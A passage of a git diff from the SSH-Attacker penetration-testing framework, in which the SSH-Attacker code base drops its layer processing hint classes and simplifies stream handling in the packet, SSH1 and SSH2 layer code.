from lower layer, nothing more to receive"); @@ -177,11 +173,8 @@ public HintedInputStream getDataStream() throws IOException { return currentInputStream; } else { LOGGER.debug("Trying to get datastream while no data is available"); - // this.receiveMoreDataForHint(null); - // <--- Testing --> - throw new EndOfStreamException( - "The original data stream does not produce any more data and there is no next datastream -> returning now"); - // return currentInputStream; + receiveMoreData(); + return currentInputStream; } } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/hints/LayerProcessingHint.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/hints/LayerProcessingHint.java deleted file mode 100644 index 5f97211ea..000000000 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/hints/LayerProcessingHint.java +++ /dev/null @@ -1,14 +0,0 @@ -/* - * SSH-Attacker - A Modular Penetration Testing Framework for SSH - * - * Copyright 2014-2023 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH - * - * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 - */ -package de.rub.nds.sshattacker.core.layer.hints; - -/** - * Lower layers sometimes need a hint for which data they need to receive. This a - * LayerProcessingHint carries the necessary information. - */ -public interface LayerProcessingHint {} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/hints/PacketLayerHint.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/hints/PacketLayerHint.java deleted file mode 100644 index 08775b8fa..000000000 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/hints/PacketLayerHint.java +++ /dev/null @@ -1,61 +0,0 @@ -/* - * SSH-Attacker - A Modular Penetration Testing Framework for SSH - * - * Copyright 2014-2023 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH - * - * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 - */ -package de.rub.nds.sshattacker.core.layer.hints; - -import de.rub.nds.sshattacker.core.constants.MessageIdConstant; -import java.util.Objects; - -/** - * The Record Layer/Fragment layer need information about the messages they're sending. This class - * holds information about the messages such as their message type. - */ -public class PacketLayerHint implements LayerProcessingHint { - - private final MessageIdConstant type; - - private final Integer sequenceNumber; - - public PacketLayerHint(MessageIdConstant type) { - this.type = type; - this.sequenceNumber = null; - } - - public PacketLayerHint(MessageIdConstant type, int epoch, int sequenceNumber) { - this.type = type; - this.sequenceNumber = sequenceNumber; - } - - public boolean equals(Object other) { - if (other instanceof PacketLayerHint) { - PacketLayerHint otherHint = (PacketLayerHint) other; - if (this.type == otherHint.type) { - return true; - } - if (this.sequenceNumber == otherHint.sequenceNumber) { - return true; - } - } - return false; - } - - @Override - public int hashCode() { - int hash = 3; - hash = 79 * hash + Objects.hashCode(this.type); - hash = 79 * hash + Objects.hashCode(this.sequenceNumber); - return hash; - } - - public MessageIdConstant getType() { - return type; - } - - public Integer getSequenceNumber() { - return sequenceNumber; - } -} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/hints/PacketLayerHintSSHV1.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/hints/PacketLayerHintSSHV1.java deleted file mode 100644 index d3c270959..000000000 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/hints/PacketLayerHintSSHV1.java +++ /dev/null @@ -1,93 +0,0 @@ -/* - * SSH-Attacker - A Modular Penetration Testing Framework for SSH - * - * Copyright 2014-2023 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH - * - * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 - */ -package de.rub.nds.sshattacker.core.layer.hints; - -import de.rub.nds.sshattacker.core.constants.ProtocolMessageTypeSSHV1; -import java.util.Objects; - -/** - * The Record Layer/Fragment layer need information about the messages they're sending. This class - * holds information about the messages such as their message type. - */ -public class PacketLayerHintSSHV1 implements LayerProcessingHint { - - private final ProtocolMessageTypeSSHV1 type; - - private final Integer epoch; - - private final Integer sequenceNumber; - - private final Integer messageSequence; - - public PacketLayerHintSSHV1(ProtocolMessageTypeSSHV1 type) { - this.type = type; - this.epoch = null; - this.sequenceNumber = null; - this.messageSequence = null; - } - - public PacketLayerHintSSHV1(ProtocolMessageTypeSSHV1 type, int epoch, int sequenceNumber) { - this.type = type; - this.epoch = epoch; - this.sequenceNumber = sequenceNumber; - this.messageSequence = null; - } - - public PacketLayerHintSSHV1(ProtocolMessageTypeSSHV1 type, int messageSequence) { - this.type = type; - this.epoch = null; - this.sequenceNumber = null; - this.messageSequence = messageSequence; - } - - @Override - public boolean equals(Object other) { - if (other instanceof PacketLayerHintSSHV1) { - PacketLayerHintSSHV1 otherHint = (PacketLayerHintSSHV1) other; - if (this.type == otherHint.type) { - return true; - } - if (this.epoch == otherHint.epoch) { - return false; - } - if (this.sequenceNumber == otherHint.sequenceNumber) { - return true; - } - if (this.messageSequence == otherHint.messageSequence) { - return true; - } - } - return false; - } - - @Override - public int hashCode() { - int hash = 3; - hash = 79 * hash + Objects.hashCode(this.type); - hash = 79 * hash + Objects.hashCode(this.epoch); - hash = 79 * hash + Objects.hashCode(this.sequenceNumber); - hash = 79 * hash + Objects.hashCode(this.messageSequence); - return hash; - } - - public ProtocolMessageTypeSSHV1 getType() { - return type; - } - - public Integer getEpoch() { - return epoch; - } - - public Integer getSequenceNumber() { - return sequenceNumber; - } - - public Integer getMessageSequence() { - return messageSequence; - } -} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/PacketLayer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/PacketLayer.java index e616dd030..767459ddd 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/PacketLayer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/PacketLayer.java @@ -19,8 +19,6 @@ import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.layer.data.Preparator; import de.rub.nds.sshattacker.core.layer.data.Serializer; -import de.rub.nds.sshattacker.core.layer.hints.LayerProcessingHint; -import de.rub.nds.sshattacker.core.layer.hints.PacketLayerHint; import de.rub.nds.sshattacker.core.layer.stream.HintedLayerInputStream; import de.rub.nds.sshattacker.core.packet.AbstractPacket; import de.rub.nds.sshattacker.core.packet.BinaryPacket; @@ -46,7 +44,7 @@ import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; -public class PacketLayer extends ProtocolLayer { +public class PacketLayer extends ProtocolLayer { private static final Logger LOGGER = LogManager.getLogger(); private SshContext context; @@ -138,9 +136,8 @@ public LayerProcessingResult receiveData() { } @Override - public void receiveMoreDataForHint(LayerProcessingHint hint) throws IOException { + public void receiveMoreData() throws IOException { LOGGER.debug("[bro] receiveMoreDataForHint now in Transport"); - LayerProcessingHint desiredHint = hint; InputStream dataStream = getLowerLayer().getDataStream(); LOGGER.debug("Available Data: {}", dataStream.available()); AbstractPacketParser parser; @@ -188,9 +185,7 @@ public void receiveMoreDataForHint(LayerProcessingHint hint) throws IOException if (currentInputStream == null) { // only set new input stream if necessary, extend current stream otherwise - currentInputStream = new HintedLayerInputStream(null, this); - } else { - currentInputStream.setHint(null); + currentInputStream = new HintedLayerInputStream(this); } currentInputStream.extendStream(packet.getPayload().getValue()); } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH1Layer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH1Layer.java index 610103708..1619b961f 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH1Layer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH1Layer.java @@ -7,17 +7,6 @@ */ package de.rub.nds.sshattacker.core.layer.impl; -/*import de.rub.nds.sshattacker.core.constants.SSL2MessageType; -import de.rub.nds.sshattacker.core.constants.SSL2TotalHeaderLengths; -import de.rub.nds.sshattacker.core.constants.ssl.SSL2ByteLength; -import de.rub.nds.sshattacker.core.exceptions.EndOfStreamException; -import de.rub.nds.sshattacker.core.exceptions.TimeoutException; -import de.rub.nds.sshattacker.core.layer.LayerConfiguration; -import de.rub.nds.sshattacker.core.layer.hints.RecordLayerHint; -import de.rub.nds.sshattacker.core.layer.stream.HintedInputStream; -import de.rub.nds.sshattacker.core.protocol.common.ProtocolMessagePreparator; -import de.rub.nds.sshattacker.core.protocol.common.ProtocolMessageSerializer; -import de.rub.nds.sshattacker.core.protocol.message.*;*/ import de.rub.nds.modifiablevariable.util.ArrayConverter; import de.rub.nds.sshattacker.core.constants.MessageIdConstant; import de.rub.nds.sshattacker.core.constants.MessageIdConstantSSH1; @@ -29,9 +18,6 @@ import de.rub.nds.sshattacker.core.layer.ProtocolLayer; import de.rub.nds.sshattacker.core.layer.constant.ImplementedLayers; import de.rub.nds.sshattacker.core.layer.context.SshContext; -import de.rub.nds.sshattacker.core.layer.hints.LayerProcessingHint; -import de.rub.nds.sshattacker.core.layer.hints.PacketLayerHint; -import de.rub.nds.sshattacker.core.layer.hints.PacketLayerHintSSHV1; import de.rub.nds.sshattacker.core.layer.stream.HintedInputStream; import de.rub.nds.sshattacker.core.layer.stream.HintedInputStreamAdapterStream; import de.rub.nds.sshattacker.core.layer.stream.HintedLayerInputStream; @@ -50,7 +36,7 @@ import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; -public class SSH1Layer extends ProtocolLayer { +public class SSH1Layer extends ProtocolLayer { private static final Logger LOGGER = LogManager.getLogger(); private SshContext context; @@ -166,7 +152,6 @@ public LayerProcessingResult receiveData() { return getLayerResult(); } LOGGER.debug("[bro] Searching for Hint"); - LayerProcessingHint tempHint = dataStream.getHint(); byte[] streamContent; try { @@ -320,7 +305,7 @@ private void readSessionKeyData(AbstractPacket packet) { temp_stream = new HintedInputStreamAdapterStream( - null, new ByteArrayInputStream(packet.getPayload().getValue())); + new ByteArrayInputStream(packet.getPayload().getValue())); readContainerFromStream(message, context, temp_stream); } @@ -330,7 +315,7 @@ private void readDisconnectData(AbstractPacket packet) { temp_stream = new HintedInputStreamAdapterStream( - null, new ByteArrayInputStream(packet.getPayload().getValue())); + new ByteArrayInputStream(packet.getPayload().getValue())); readContainerFromStream(message, context, temp_stream); } @@ -340,7 +325,7 @@ private void readUserData(AbstractPacket packet) { temp_stream = new HintedInputStreamAdapterStream( - null, new ByteArrayInputStream(packet.getPayload().getValue())); + new ByteArrayInputStream(packet.getPayload().getValue())); readContainerFromStream(message, context, temp_stream); } @@ -350,7 +335,7 @@ private void readSuccessMessage(AbstractPacket packet) { temp_stream = new HintedInputStreamAdapterStream( - null, new ByteArrayInputStream(packet.getPayload().getValue())); + new ByteArrayInputStream(packet.getPayload().getValue())); readContainerFromStream(message, context, temp_stream); } @@ -360,134 +345,17 @@ private void readFailureMessage(AbstractPacket packet) { temp_stream = new HintedInputStreamAdapterStream( - null, new ByteArrayInputStream(packet.getPayload().getValue())); + new ByteArrayInputStream(packet.getPayload().getValue())); readContainerFromStream(message, context, temp_stream); } - public void readMessageForHint(PacketLayerHintSSHV1 hint) { - switch (hint.getType()) { - // use correct parser for the message - case SSH_CMSG_AUTH_RHOSTS_RSA: - // Read CMSG_AUTH_RHOSTS_RSA - case SSH_MSG_DISCONNECT: - // Handle SSH_MSG_DISCONNECT message - break; - case SSH_SMSG_PUBLIC_KEY: - // readPublicKeyData(); - break; - case SSH_CMSG_SESSION_KEY: - // Handle SSH_CMSG_SESSION_KEY message - break; - case SSH_CMSG_USER: - // Handle SSH_CMSG_USER message - break; - case SSH_CMSG_AUTH_RHOSTS: - // Handle SSH_CMSG_AUTH_RHOSTS message - break; - case SSH_CMSG_AUTH_RSA: - // Handle SSH_CMSG_AUTH_RSA message - break; - case SSH_SMSG_AUTH_RSA_CHALLENGE: - // Handle SSH_SMSG_AUTH_RSA_CHALLENGE message - break; - case SSH_CMSG_AUTH_RSA_RESPONSE: - // Handle SSH_CMSG_AUTH_RSA_RESPONSE message - break; - case SSH_CMSG_AUTH_PASSWORD: - // Handle SSH_CMSG_AUTH_PASSWORD message - break; - case SSH_CMSG_REQUEST_PTY: - // Handle SSH_CMSG_REQUEST_PTY message - break; - case SSH_CMSG_WINDOW_SIZE: - // Handle SSH_CMSG_WINDOW_SIZE message - break; - case SSH_CMSG_EXEC_SHELL: - // Handle SSH_CMSG_EXEC_SHELL message - break; - case SSH_CMSG_EXEC_CMD: - // Handle SSH_CMSG_EXEC_CMD message - break; - case SSH_SMSG_SUCCESS: - // Handle SSH_SMSG_SUCCESS message - break; - case SSH_SMSG_FAILURE: - // Handle SSH_SMSG_FAILURE message - break; - case SSH_CMSG_STDIN_DATA: - // Handle SSH_CMSG_STDIN_DATA message - break; - case SSH_SMSG_STDOUT_DATA: - // Handle SSH_SMSG_STDOUT_DATA message - break; - case SSH_SMSG_STDERR_DATA: - // Handle SSH_SMSG_STDERR_DATA message - break; - case SSH_CMSG_EOF: - // Handle SSH_CMSG_EOF message - break; - case SSH_SMSG_EXITSTATUS: - // Handle SSH_SMSG_EXITSTATUS message - break; - case SSH_MSG_CHANNEL_OPEN_CONFIRMATION: - // Handle SSH_MSG_CHANNEL_OPEN_CONFIRMATION message - break; - case SSH_MSG_CHANNEL_OPEN_FAILURE: - // Handle SSH_MSG_CHANNEL_OPEN_FAILURE message - break; - case SSH_MSG_CHANNEL_DATA: - // Handle SSH_MSG_CHANNEL_DATA message - break; - case SSH_MSG_CHANNEL_CLOSE: - // Handle SSH_MSG_CHANNEL_CLOSE message - break; - case SSH_MSG_CHANNEL_CLOSE_CONFIRMATION: - // Handle SSH_MSG_CHANNEL_CLOSE_CONFIRMATION message - break; - case SSH_SMSG_X11_OPEN: - // Handle SSH_SMSG_X11_OPEN message - break; - case SSH_CMSG_PORT_FORWARD_REQUEST: - // Handle SSH_CMSG_PORT_FORWARD_REQUEST message - break; - case SSH_MSG_PORT_OPEN: - // Handle SSH_MSG_PORT_OPEN message - break; - case SSH_CMSG_AGENT_REQUEST_FORWARDING: - // Handle SSH_CMSG_AGENT_REQUEST_FORWARDING message - break; - case SSH_SMSG_AGENT_OPEN: - // Handle SSH_SMSG_AGENT_OPEN message - break; - case SSH_MSG_IGNORE: - // Handle SSH_MSG_IGNORE message - break; - case SSH_CMSG_EXIT_CONFIRMATION: - // Handle SSH_CMSG_EXIT_CONFIRMATION message - break; - case SSH_CMSG_X11_REQUEST_FORWARDING: - // Handle SSH_CMSG_X11_REQUEST_FORWARDING message - break; - case SSH_MSG_DEBUG: - // Handle SSH_MSG_DEBUG message - break; - case SSH_CMSG_REQUEST_COMPRESSION: - // Handle SSH_CMSG_REQUEST_COMPRESSION message - break; - default: - LOGGER.error("Undefined record layer type, found type {}", hint.getType()); - throw new RuntimeException(); - // break; - } - } - private void readPublicKeyData(AbstractPacket packet) { ServerPublicKeyMessage message = new ServerPublicKeyMessage(); HintedInputStream temp_stream; temp_stream = new HintedInputStreamAdapterStream( - null, new ByteArrayInputStream(packet.getPayload().getValue())); + new ByteArrayInputStream(packet.getPayload().getValue())); readContainerFromStream(message, context, temp_stream); // readDataContainer(message, context); } @@ -498,7 +366,7 @@ private void readASCIIData(AbstractPacket packet) { temp_stream = new HintedInputStreamAdapterStream( - null, new ByteArrayInputStream(packet.getPayload().getValue())); + new ByteArrayInputStream(packet.getPayload().getValue())); readContainerFromStream(message, context, temp_stream); // readDataContainer(message, context); } @@ -509,7 +377,7 @@ private void readVersionExchangeProtocolData(AbstractPacket packet) temp_stream = new HintedInputStreamAdapterStream( - null, new ByteArrayInputStream(packet.getPayload().getValue())); + new ByteArrayInputStream(packet.getPayload().getValue())); readContainerFromStream(message, context, temp_stream); // readDataContainer(message, context); @@ -526,76 +394,12 @@ private static int resolveUnpaddedMessageLength(final byte[] totalHeaderLength) }*/ @Override - public void receiveMoreDataForHint(LayerProcessingHint hint) throws IOException { + public void receiveMoreData() throws IOException { try { HintedInputStream dataStream = null; dataStream = getLowerLayer().getDataStream(); - if (dataStream.getHint() == null) { - LOGGER.warn( - "The SSH layer requires a processing hint. E.g. a record type. Parsing as an unknown fragment"); - currentInputStream = new HintedLayerInputStream(null, this); - currentInputStream.extendStream(dataStream.readAllBytes()); - } else if (dataStream.getHint() instanceof PacketLayerHint) { - PacketLayerHint tempHint = (PacketLayerHint) dataStream.getHint(); - /*if (tempHint.getType() == ProtocolMessageType.HANDSHAKE) { - DtlsHandshakeMessageFragment fragment = new DtlsHandshakeMessageFragment(); - fragment.setEpoch(tempHint.getEpoch()); - DtlsHandshakeMessageFragmentParser parser = - fragment.getParser( - context, - new ByteArrayInputStream( - dataStream.readChunk(dataStream.available()))); - parser.parse(fragment); - fragment.setCompleteResultingMessage( - fragment.getSerializer(context).serialize()); - fragmentManager.addMessageFragment(fragment); - List uninterpretedMessageFragments = - fragmentManager.getOrderedCombinedUninterpretedMessageFragments( - true, false); - // run until we received a complete fragment - if (!uninterpretedMessageFragments.isEmpty()) { - DtlsHandshakeMessageFragment uninterpretedMessageFragment = - uninterpretedMessageFragments.get(0); - addProducedContainer(uninterpretedMessageFragment); - RecordLayerHint currentHint = - new RecordLayerHint( - uninterpretedMessageFragment.getProtocolMessageType(), - uninterpretedMessageFragment - .getMessageSequence() - .getValue()); - byte type = uninterpretedMessageFragment.getType().getValue(); - byte[] content = - uninterpretedMessageFragment.getMessageContent().getValue(); - byte[] message = - ArrayConverter.concatenate( - new byte[] {type}, - ArrayConverter.intToBytes( - content.length, - HandshakeByteLength.MESSAGE_LENGTH_FIELD), - content); - if (desiredHint == null || currentHint.equals(desiredHint)) { - if (currentInputStream == null) { - currentInputStream = new HintedLayerInputStream(currentHint, this); - } else { - currentInputStream.setHint(currentHint); - } - currentInputStream.extendStream(message); - } else { - if (nextInputStream == null) { - nextInputStream = new HintedLayerInputStream(currentHint, this); - } else { - nextInputStream.setHint(currentHint); - } - nextInputStream.extendStream(message); - } - } else { - receiveMoreDataForHint(desiredHint); - } - } else { - currentInputStream = new HintedLayerInputStream(tempHint, this); - currentInputStream.extendStream(dataStream.readChunk(dataStream.available())); - }*/ - } + currentInputStream = new HintedLayerInputStream(this); + currentInputStream.extendStream(dataStream.readAllBytes()); } catch (TimeoutException ex) { LOGGER.debug(ex); throw ex; diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH2Layer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH2Layer.java index 4a1590a34..2d7460190 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH2Layer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH2Layer.java @@ -15,7 +15,6 @@ import de.rub.nds.sshattacker.core.layer.ProtocolLayer; import de.rub.nds.sshattacker.core.layer.constant.ImplementedLayers; import de.rub.nds.sshattacker.core.layer.context.SshContext; -import de.rub.nds.sshattacker.core.layer.hints.LayerProcessingHint; import de.rub.nds.sshattacker.core.layer.stream.HintedInputStream; import de.rub.nds.sshattacker.core.layer.stream.HintedInputStreamAdapterStream; import de.rub.nds.sshattacker.core.layer.stream.HintedLayerInputStream; @@ -38,7 +37,7 @@ import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; -public class SSH2Layer extends ProtocolLayer { +public class SSH2Layer extends ProtocolLayer { private static final Logger LOGGER = LogManager.getLogger(); private SshContext context; @@ -106,7 +105,6 @@ public LayerProcessingResult receiveData() { LOGGER.warn("The lower layer did not produce a data stream: ", e); return getLayerResult(); } - LayerProcessingHint tempHint = dataStream.getHint(); byte[] streamContent; try { @@ -411,7 +409,7 @@ private void readUserAuthReq(AbstractPacket packet) { HintedInputStream temp_stream; inputStream = new HintedInputStreamAdapterStream( - null, new ByteArrayInputStream(packet.getPayload().getValue())); + new ByteArrayInputStream(packet.getPayload().getValue())); UserAuthUnknownMessageParser parser = new UserAuthUnknownMessageParser(inputStream); parser.parse(userAuthUnknownMessage); String methodString = userAuthUnknownMessage.getMethodName().getValue(); @@ -431,7 +429,6 @@ private void readUserAuthReq(AbstractPacket packet) { UserAuthNoneMessage userAuthNoneMessage = new UserAuthNoneMessage(); temp_stream = new HintedInputStreamAdapterStream( - null, new ByteArrayInputStream( userAuthUnknownMessage .getCompleteResultingMessage() @@ -444,7 +441,6 @@ private void readUserAuthReq(AbstractPacket packet) { UserAuthPasswordMessage userAuthPasswordMessage = new UserAuthPasswordMessage(); temp_stream = new HintedInputStreamAdapterStream( - null, new ByteArrayInputStream( userAuthUnknownMessage .getCompleteResultingMessage() @@ -458,7 +454,6 @@ private void readUserAuthReq(AbstractPacket packet) { UserAuthPubkeyMessage userAuthPubkeyMessage = new UserAuthPubkeyMessage(); temp_stream = new HintedInputStreamAdapterStream( - null, new ByteArrayInputStream( userAuthUnknownMessage .getCompleteResultingMessage() @@ -471,7 +466,6 @@ private void readUserAuthReq(AbstractPacket packet) { UserAuthHostbasedMessage userAuthHostbasedMessage = new UserAuthHostbasedMessage(); temp_stream = new HintedInputStreamAdapterStream( - null, new ByteArrayInputStream( userAuthUnknownMessage .getCompleteResultingMessage() @@ -484,7 +478,6 @@ private void readUserAuthReq(AbstractPacket packet) { new UserAuthKeyboardInteractiveMessage(); temp_stream = new HintedInputStreamAdapterStream( - null, new ByteArrayInputStream( userAuthUnknownMessage .getCompleteResultingMessage() @@ -509,7 +502,7 @@ private void readChannelRequest(AbstractPacket packet) { inputStream = new HintedInputStreamAdapterStream( - null, new ByteArrayInputStream(packet.getPayload().getValue())); + new ByteArrayInputStream(packet.getPayload().getValue())); ChannelRequestUnknownMessageParser parser = new ChannelRequestUnknownMessageParser(inputStream); @@ -531,7 +524,6 @@ private void readChannelRequest(AbstractPacket packet) { ChannelRequestPtyMessage channelRequestPtyMessage = new ChannelRequestPtyMessage(); temp_stream = new HintedInputStreamAdapterStream( - null, new ByteArrayInputStream( channelRequestUnknownMessage .getCompleteResultingMessage() @@ -544,7 +536,6 @@ private void readChannelRequest(AbstractPacket packet) { ChannelRequestX11Message channelRequestX11Message = new ChannelRequestX11Message(); temp_stream = new HintedInputStreamAdapterStream( - null, new ByteArrayInputStream( channelRequestUnknownMessage .getCompleteResultingMessage() @@ -558,7 +549,6 @@ private void readChannelRequest(AbstractPacket packet) { ChannelRequestEnvMessage channelRequestEnvMessage = new ChannelRequestEnvMessage(); temp_stream = new HintedInputStreamAdapterStream( - null, new ByteArrayInputStream( channelRequestUnknownMessage .getCompleteResultingMessage() @@ -572,7 +562,6 @@ private void readChannelRequest(AbstractPacket packet) { new ChannelRequestShellMessage(); temp_stream = new HintedInputStreamAdapterStream( - null, new ByteArrayInputStream( channelRequestUnknownMessage .getCompleteResultingMessage() @@ -585,7 +574,6 @@ private void readChannelRequest(AbstractPacket packet) { new ChannelRequestExecMessage(); temp_stream = new HintedInputStreamAdapterStream( - null, new ByteArrayInputStream( channelRequestUnknownMessage .getCompleteResultingMessage() @@ -598,7 +586,6 @@ private void readChannelRequest(AbstractPacket packet) { new ChannelRequestSubsystemMessage(); temp_stream = new HintedInputStreamAdapterStream( - null, new ByteArrayInputStream( channelRequestUnknownMessage .getCompleteResultingMessage() @@ -611,7 +598,6 @@ private void readChannelRequest(AbstractPacket packet) { new ChannelRequestWindowChangeMessage(); temp_stream = new HintedInputStreamAdapterStream( - null, new ByteArrayInputStream( channelRequestUnknownMessage .getCompleteResultingMessage() @@ -623,7 +609,6 @@ private void readChannelRequest(AbstractPacket packet) { new ChannelRequestXonXoffMessage(); temp_stream = new HintedInputStreamAdapterStream( - null, new ByteArrayInputStream( channelRequestUnknownMessage .getCompleteResultingMessage() @@ -635,7 +620,6 @@ private void readChannelRequest(AbstractPacket packet) { new ChannelRequestSignalMessage(); temp_stream = new HintedInputStreamAdapterStream( - null, new ByteArrayInputStream( channelRequestUnknownMessage .getCompleteResultingMessage() @@ -647,7 +631,6 @@ private void readChannelRequest(AbstractPacket packet) { new ChannelRequestExitStatusMessage(); temp_stream = new HintedInputStreamAdapterStream( - null, new ByteArrayInputStream( channelRequestUnknownMessage .getCompleteResultingMessage() @@ -659,7 +642,6 @@ private void readChannelRequest(AbstractPacket packet) { new ChannelRequestExitSignalMessage(); temp_stream = new HintedInputStreamAdapterStream( - null, new ByteArrayInputStream( channelRequestUnknownMessage .getCompleteResultingMessage() @@ -671,7 +653,6 @@ private void readChannelRequest(AbstractPacket packet) { new ChannelRequestAuthAgentMessage(); temp_stream = new HintedInputStreamAdapterStream( - null, new ByteArrayInputStream( channelRequestUnknownMessage .getCompleteResultingMessage() @@ -694,7 +675,7 @@ private void readGlobalRequest(AbstractPacket packet) { inputStream = new HintedInputStreamAdapterStream( - null, new ByteArrayInputStream(packet.getPayload().getValue())); + new ByteArrayInputStream(packet.getPayload().getValue())); GlobalRequestUnknownMessageParser parser = new GlobalRequestUnknownMessageParser(inputStream); @@ -707,7 +688,6 @@ private void readGlobalRequest(AbstractPacket packet) { new GlobalRequestTcpIpForwardMessage(); temp_stream = new HintedInputStreamAdapterStream( - null, new ByteArrayInputStream( globalRequestUnknownMessage .getCompleteResultingMessage() @@ -718,7 +698,6 @@ private void readGlobalRequest(AbstractPacket packet) { new GlobalRequestCancelTcpIpForwardMessage(); temp_stream = new HintedInputStreamAdapterStream( - null, new ByteArrayInputStream( globalRequestUnknownMessage .getCompleteResultingMessage() @@ -729,7 +708,6 @@ private void readGlobalRequest(AbstractPacket packet) { new GlobalRequestNoMoreSessionsMessage(); temp_stream = new HintedInputStreamAdapterStream( - null, new ByteArrayInputStream( globalRequestUnknownMessage .getCompleteResultingMessage() @@ -740,7 +718,6 @@ private void readGlobalRequest(AbstractPacket packet) { new GlobalRequestOpenSshHostKeysMessage(); temp_stream = new HintedInputStreamAdapterStream( - null, new ByteArrayInputStream( globalRequestUnknownMessage .getCompleteResultingMessage() @@ -758,7 +735,7 @@ private void readASCIIData(AbstractPacket packet) { temp_stream = new HintedInputStreamAdapterStream( - null, new ByteArrayInputStream(packet.getPayload().getValue())); + new ByteArrayInputStream(packet.getPayload().getValue())); readContainerFromStream(message, context, temp_stream); } @@ -768,7 +745,7 @@ private void readIngoreMessage(AbstractPacket packet) { temp_stream = new HintedInputStreamAdapterStream( - null, new ByteArrayInputStream(packet.getPayload().getValue())); + new ByteArrayInputStream(packet.getPayload().getValue())); readContainerFromStream(message, context, temp_stream); } @@ -778,7 +755,7 @@ private void readKexECDHInit(AbstractPacket packet) { temp_stream = new HintedInputStreamAdapterStream( - null, new ByteArrayInputStream(packet.getPayload().getValue())); + new ByteArrayInputStream(packet.getPayload().getValue())); readContainerFromStream(message, context, temp_stream); } @@ -788,7 +765,7 @@ private void readKexECDHReply(AbstractPacket packet) { temp_stream = new HintedInputStreamAdapterStream( - null, new ByteArrayInputStream(packet.getPayload().getValue())); + new ByteArrayInputStream(packet.getPayload().getValue())); readContainerFromStream(message, context, temp_stream); } @@ -798,7 +775,7 @@ private void readChannelSuccessMessage(AbstractPacket packet) { temp_stream = new HintedInputStreamAdapterStream( - null, new ByteArrayInputStream(packet.getPayload().getValue())); + new ByteArrayInputStream(packet.getPayload().getValue())); readContainerFromStream(message, context, temp_stream); } @@ -808,7 +785,7 @@ private void readChannelCloseMessage(AbstractPacket packet) { temp_stream = new HintedInputStreamAdapterStream( - null, new ByteArrayInputStream(packet.getPayload().getValue())); + new ByteArrayInputStream(packet.getPayload().getValue())); readContainerFromStream(message, context, temp_stream); } @@ -818,7 +795,7 @@ private void readChannelEofMessage(AbstractPacket packet) { temp_stream = new HintedInputStreamAdapterStream( - null, new ByteArrayInputStream(packet.getPayload().getValue())); + new ByteArrayInputStream(packet.getPayload().getValue())); readContainerFromStream(message, context, temp_stream); } @@ -828,7 +805,7 @@ private void readChannelExtendedDataMessage(AbstractPacket packet) temp_stream = new HintedInputStreamAdapterStream( - null, new ByteArrayInputStream(packet.getPayload().getValue())); + new ByteArrayInputStream(packet.getPayload().getValue())); readContainerFromStream(message, context, temp_stream); } @@ -838,7 +815,7 @@ private void readChannelFailureMessage(AbstractPacket packet) { temp_stream = new HintedInputStreamAdapterStream( - null, new ByteArrayInputStream(packet.getPayload().getValue())); + new ByteArrayInputStream(packet.getPayload().getValue())); readContainerFromStream(message, context, temp_stream); } @@ -848,7 +825,7 @@ private void readChannelOpenFailureMessage(AbstractPacket packet) temp_stream = new HintedInputStreamAdapterStream( - null, new ByteArrayInputStream(packet.getPayload().getValue())); + new ByteArrayInputStream(packet.getPayload().getValue())); readContainerFromStream(message, context, temp_stream); } @@ -858,7 +835,7 @@ private void readChannelOpenConfirmation(AbstractPacket packet) { temp_stream = new HintedInputStreamAdapterStream( - null, new ByteArrayInputStream(packet.getPayload().getValue())); + new ByteArrayInputStream(packet.getPayload().getValue())); readContainerFromStream(message, context, temp_stream); } @@ -868,7 +845,7 @@ private void readUserAuthSucc(AbstractPacket packet) { temp_stream = new HintedInputStreamAdapterStream( - null, new ByteArrayInputStream(packet.getPayload().getValue())); + new ByteArrayInputStream(packet.getPayload().getValue())); readContainerFromStream(message, context, temp_stream); } @@ -878,7 +855,7 @@ private void readDisconnect(AbstractPacket packet) { temp_stream = new HintedInputStreamAdapterStream( - null, new ByteArrayInputStream(packet.getPayload().getValue())); + new ByteArrayInputStream(packet.getPayload().getValue())); readContainerFromStream(message, context, temp_stream); } @@ -888,7 +865,7 @@ private void readGexDHExchangeOldRequest(AbstractPacket packet) { temp_stream = new HintedInputStreamAdapterStream( - null, new ByteArrayInputStream(packet.getPayload().getValue())); + new ByteArrayInputStream(packet.getPayload().getValue())); readContainerFromStream(message, context, temp_stream); } @@ -898,7 +875,7 @@ private void readGexKeyExchangeGroup(AbstractPacket packet) { temp_stream = new HintedInputStreamAdapterStream( - null, new ByteArrayInputStream(packet.getPayload().getValue())); + new 